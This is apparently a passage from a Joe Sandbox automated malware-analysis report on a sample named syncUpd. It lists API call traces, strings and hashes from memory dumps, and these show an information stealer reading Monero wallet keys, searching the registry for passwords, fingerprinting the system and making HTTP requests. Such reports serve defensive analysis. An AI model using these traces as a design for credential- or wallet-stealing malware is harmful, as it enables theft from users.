                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00624DAC), ref: 0090224A
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 009056F7: GetFileAttributesA.KERNEL32(00000000,?,008F1CAB,?,?,004215E4,?,?,0041D7E2), ref: 00905706
                                                                                                                                                                                                                                                                • Part of subcall function 008F9927: StrStrA.SHLWAPI(00000000,006248E8), ref: 008F9982
                                                                                                                                                                                                                                                                • Part of subcall function 008F9927: memcmp.MSVCRT ref: 008F99DB
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F9633
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008F9658
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalAlloc.KERNEL32(00000040,?), ref: 008F9678
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: ReadFile.KERNEL32(000000FF,?,00000000,008F16B6,00000000), ref: 008F96A1
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalFree.KERNEL32(008F16B6), ref: 008F96D7
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CloseHandle.KERNEL32(000000FF), ref: 008F96E1
                                                                                                                                                                                                                                                                • Part of subcall function 00905D27: GlobalAlloc.KERNEL32(00000000,009022EE,009022EE), ref: 00905D3A
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,006248D8), ref: 00902304
                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00902400
                                                                                                                                                                                                                                                                • Part of subcall function 008F9707: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008F4E15,00000000,00000000), ref: 008F9736
                                                                                                                                                                                                                                                                • Part of subcall function 008F9707: LocalAlloc.KERNEL32(00000040,?,?,?,008F4E15,00000000,?), ref: 008F9748
                                                                                                                                                                                                                                                                • Part of subcall function 008F9707: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008F4E15,00000000,00000000), ref: 008F9771
                                                                                                                                                                                                                                                                • Part of subcall function 008F9707: LocalFree.KERNEL32(?,?,?,?,008F4E15,00000000,?), ref: 008F9786
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memcmp.MSVCRT ref: 008F9A72
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memset.MSVCRT ref: 008F9AA5
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: LocalAlloc.KERNEL32(00000040,?), ref: 008F9AF5
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00902391
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 009023AE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 009023C0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 009023D3
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041D840), ref: 009023E2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1812951797-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004012E7
                                                                                                                                                                                                                                                                • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                                                • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                                                • Part of subcall function 00401260: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                                                • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                                                • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004014D0
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0095DC90), ref: 00404ED9
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$CopyCreateDeleteFreeHandleInternetProcessQueryReadSizeSystemTimeValue
                                                                                                                                                                                                                                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                              • API String ID: 330749937-218353709
                                                                                                                                                                                                                                                              • Opcode ID: 305962daf2602191b7e2f382e09e65ef34577e4f9fb4e706ccba5eb953d9931d
                                                                                                                                                                                                                                                              • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 305962daf2602191b7e2f382e09e65ef34577e4f9fb4e706ccba5eb953d9931d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                                                • Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 00407018
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000, : ), ref: 0040702A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040705F
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 004070A3
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                                              • task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                                                                                                              • String ID: : $`v@$h0A
                                                                                                                                                                                                                                                              • API String ID: 3191641157-3559972273
                                                                                                                                                                                                                                                              • Opcode ID: a80821301df9fc98fc2fea46b77aea938f25e64f1e98b9be3b3876524ebf38a9
                                                                                                                                                                                                                                                              • Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a80821301df9fc98fc2fea46b77aea938f25e64f1e98b9be3b3876524ebf38a9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                                                                                                              • API String ID: 0-3785015651
                                                                                                                                                                                                                                                              • Opcode ID: f49c1257dc185d8d1ff095b11ccc5862cd9d4f3fd77aecdbcfb3a1e41bc60b00
                                                                                                                                                                                                                                                              • Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f49c1257dc185d8d1ff095b11ccc5862cd9d4f3fd77aecdbcfb3a1e41bc60b00
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008F475D
                                                                                                                                                                                                                                                                • Part of subcall function 008F46D7: InternetCrackUrlA.WININET(00000000,00000000), ref: 008F476D
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008F483C
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00624C68), ref: 008F4861
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008F49E1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,0041E044,00000000,?,00624CF4), ref: 008F4D0F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 008F4D2B
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 008F4D3F
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008F4D70
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F4DD4
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F4DEC
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,00624C84,?,00624AB0,00000000,00000000,00400100,00000000), ref: 008F4A3C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 008F4DF6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 460715078-0
                                                                                                                                                                                                                                                              • Opcode ID: 186e0976d42a377170bf95904968b890918cbcfc74f47cf10a8b65478b08e6f4
                                                                                                                                                                                                                                                              • Instruction ID: 508f4f6a7b5e4a2659645d88d9b848ccaf4e40d9f821f64246bbe295258277c5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 186e0976d42a377170bf95904968b890918cbcfc74f47cf10a8b65478b08e6f4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B412B876D04218AECB15EBA0DDA2FEEB779AF94714F104199B106A21D1EF703F48CB51
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,?), ref: 008FF9A2
                                                                                                                                                                                                                                                                • Part of subcall function 00905747: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00905772
                                                                                                                                                                                                                                                                • Part of subcall function 00905BC7: StrStrA.SHLWAPI(?,?), ref: 00905BD3
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FF9DE
                                                                                                                                                                                                                                                                • Part of subcall function 00905BC7: lstrcpyn.KERNEL32(00625310,?,?), ref: 00905BF7
                                                                                                                                                                                                                                                                • Part of subcall function 00905BC7: lstrlen.KERNEL32(?), ref: 00905C0E
                                                                                                                                                                                                                                                                • Part of subcall function 00905BC7: wsprintfA.USER32 ref: 00905C2E
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFA26
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFA6E
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFAB5
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFAFD
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFB45
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFB8C
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 008FFBD4
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrlen.KERNEL32(008F4E2C,?,?,008F4E2C,0041D79A), ref: 00907092
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrcpy.KERNEL32(0041D79A,00000000), ref: 009070EC
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 008FFCF6
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4276352425-0
                                                                                                                                                                                                                                                              • Opcode ID: e6a7c0ac9f1fb61494969f18be3aa34b02d47fee828f2ee4e8056f5644afee52
                                                                                                                                                                                                                                                              • Instruction ID: f82602e09ac5d4278de24d1f6feedb0d4134dc9c1c86e6754e40c0923358895e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e6a7c0ac9f1fb61494969f18be3aa34b02d47fee828f2ee4e8056f5644afee52
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 757157B1D006199FCB24EBA0DC89FEE7779AF94301F044598F109A3191EF71AA899F60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00406CE4
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00406D0A
                                                                                                                                                                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29
                                                                                                                                                                                                                                                                • Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B
                                                                                                                                                                                                                                                              • task.LIBCPMTD ref: 00406F25
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                                                              • String ID: Password
                                                                                                                                                                                                                                                              • API String ID: 2698061284-3434357891
                                                                                                                                                                                                                                                              • Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                                              • Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00904446
                                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(00624DC0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00904483
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00904507
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0090450E
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00904544
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID: :$C$\
                                                                                                                                                                                                                                                              • API String ID: 1544550907-3809124531
                                                                                                                                                                                                                                                              • Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                                              • Instruction ID: e4a1816fe5cfdd1ee86dab96ed58173de565a92168727f62028c72807c246ec1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E13170B0D042489FDF20DBA4DC45FEE7BB8AF48704F044098E649A72C1DB75AA94CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                              • String ID: '@$'@
